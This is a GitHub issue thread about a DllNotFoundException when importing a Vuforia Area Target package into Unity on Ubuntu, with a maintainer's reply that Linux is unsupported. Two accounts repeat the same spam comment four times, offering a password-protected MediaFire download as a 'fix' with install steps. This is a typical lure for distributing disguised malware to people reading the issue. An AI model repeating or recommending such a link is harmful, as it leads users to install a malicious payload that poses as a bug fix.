### ISSUE TITLE
Getting a DllNotFoundException when trying to import Area target unitypackage

### ISSUE THREAD

**Issue by Final-Singularity** [PTCInc/vuforia-engine#151]
**Summarize the bug:**
I am using unity in Ubuntu 23.10, it has been working fine for normal usecases (Image Target, etc), however Area target unitypackage generated from ATG (from windows) is not getting imported properly in Unity. While importing, I am getting an error that says
DllNotFoundException: VuforiaEngine.dll assembly:<unknown assembly> type:<unknown type> member:(null)
Vuforia.Internal.Utility.GLTFLoading.GLTFExtractorUtility.Initialize (System.String path, UnityEngine.Material[] sourceMaterials, System.Boolean ignoreMaterials) (at <f15618170c874b098fae36706dbe49d0>:0)

PFA the log file 
[AreaTarget_Editorlog.txt](https://github.com/user-attachments/files/16823718/AreaTarget_Editorlog.txt)

**Observed problem**
1.  I created a fresh project, imported vuforia, added AR Camera and License key, changed the player settings to IL2CPP (armv64)
2.  Tried to import the unitypackage for my area -- and it resulted in the above error
   Log - 
[AreaTarget_Editorlog.txt](https://github.com/user-attachments/files/16823728/AreaTarget_Editorlog.txt)

3.  Alternatively, I tried to create an Area Target GameObject first and then import the unitypackage -- still resulted in the same error along with some others
    Log - 
[AreaTarget_Editorlog_wgameobject.txt](https://github.com/user-attachments/files/16823729/AreaTarget_Editorlog_wgameobject.txt)

**Expected result**
Package should get imported without errors and should be able to view the space using Area Target gameObject

**Other observations**
Even with the errors, the package becomes visible in the Area Target Behaviour database drop down, but has no effect upon being selected

**Affected Vuforia Engine version:**
v10.25.4

**Affected platform:**
 - Ubuntu 23.10

**Affected database**
PFA the Area Target unitypackage that I was trying to import
[Ittina_Akkala_Road.zip](https://github.com/user-attachments/files/16823745/Ittina_Akkala_Road.zip)

Thanks in advance,

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by ptc-epassaro** [comment]
Hi @Final-Singularity, thanks for the report. Unfortunately Vuforia Engine is not officially supported on Linux and it does not include a Linux binary. This is not a problem for most of the target types because they don't interact with Vuforia Engine directly while in the Unity Editor. Area Targets are special in this sense, as even in the Editor they rely on the VuforiaEngine.dll to perform some operations.

Unfortunately this is the expected behaviour when using Vuforia in Unity on Linux. If possible, I would recommend you to use Vuforia Engine on Windows or MacOS to avoid this issue.
If not, then feel free to open a new "Feature Feedback" Issue on this repository for the Linux support and our team will look into it.

Thank you and sorry I cannot give you a more satisfying answer.

**Comment by Final-Singularity** [comment]
Hi @ptc-epassaro , thanks for your response. I have been trying to use Unity and Vuforia for a long time now, but I am always facing some or the other issues in Windows, which is why I moved to linux where those issues resolved but unfortunately, the area target support is not possible. I am retrying in Windows now and am creating new bug reports for the issues I am facing. I will be really greatful if you guys can support me through these issues, thanks
